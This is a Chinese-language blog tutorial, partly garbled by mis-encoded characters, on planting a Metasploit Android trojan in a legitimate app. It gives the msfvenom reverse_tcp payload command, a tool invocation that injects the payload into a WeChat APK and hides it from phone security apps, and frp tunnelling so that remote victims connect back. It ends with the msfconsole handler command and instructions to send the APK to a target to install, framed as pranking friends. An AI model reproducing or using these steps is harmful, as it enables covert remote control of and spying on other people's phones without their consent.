聲明:
- 本文章僅做娛樂(lè)和學(xué)習(xí),切勿非法使用!!
- 本人技術(shù)一般,水平有限,如有不對(duì)請(qǐng)多多指正。
一、環(huán)境準(zhǔn)備
- Kali Linux
- 安卓手機(jī)一部(安卓11)
二、內(nèi)網(wǎng)穿透
要想玩的好,總不能本地玩自己吧,也得和周邊朋友開(kāi)個(gè)玩笑吧,所以就得做內(nèi)網(wǎng)穿透了,免費(fèi)內(nèi)網(wǎng)穿透可以看這位大佬的
CSDN博主「Lisa Cpolar」
我這邊用的是自己frp拿自己服務(wù)器做了內(nèi)網(wǎng)穿透
三、木馬生成并加到apk
直接用msf生成的apk打開(kāi)沒(méi)有內(nèi)容,安裝報(bào)毒,且目前的安卓11以上無(wú)法直接安裝,
msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口號(hào)> R > <文件名>.apk
網(wǎng)上大部分都是生成后對(duì)apk反編譯加馬,加簽名等等,這邊用這位大佬的python工具直接給apk加馬,把msf生成的安卓遠(yuǎn)控附加進(jìn)普通的app中,并進(jìn)行加固隱藏特征??梢岳@過(guò)常見(jiàn)的手機(jī)安全管家。
大佬GItHub
使安裝python3, Java環(huán)境.
使用python3生成apk文件, 需要指定msf遠(yuǎn)控鏈接的IP和端口.(本地的填本地kali的IP,做了內(nèi)網(wǎng)穿透填穿透后的公網(wǎng)地址和端口)
python main.py --lhost 192.168.0.106 --lport 1433 -n ../微信_(tái)7.0.22.apk
三、使用msfconsole加載handler.rc進(jìn)行服務(wù)端監(jiān)聽(tīng)
加馬完成后會(huì)在WorkDir文件夾下生成一個(gè)handler.rc文件,做了內(nèi)網(wǎng)穿透的把此文件里面的ip改為kali機(jī)的IP,端口改為做kali本地監(jiān)聽(tīng)公網(wǎng)的那個(gè)端口**(注意和上面那個(gè)端口的區(qū)別)**
然后使用msfconsole加載handler.rc進(jìn)行服務(wù)端監(jiān)聽(tīng)
msfconsole -r WorkDir/handler.rc
四、將apk發(fā)給目標(biāo)機(jī)安裝
請(qǐng)勿違法違規(guī)!
五、結(jié)束
對(duì)方安裝點(diǎn)擊就會(huì)被監(jiān)聽(tīng)到,help命令查看文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-820800.html
六、問(wèn)題
現(xiàn)在手機(jī)基本都控制著不給權(quán)限,比如我用一個(gè)音樂(lè)軟件只有存儲(chǔ)和音頻權(quán)限,只能截圖,獲取安裝的軟件列表,打開(kāi)軟件之類的,要是想控制攝像頭就不行,軟件也會(huì)報(bào)錯(cuò),現(xiàn)在問(wèn)題就是沒(méi)辦法主動(dòng)獲取權(quán)限,只能由用戶授權(quán),而且大佬的加馬工具也不是所有軟件都能成功。
能力有限,水平一般,希望有辦法的大佬們指點(diǎn)一下。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-820800.html
到了這里,關(guān)于Kali Linux使用MSF木馬入侵安卓手機(jī)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!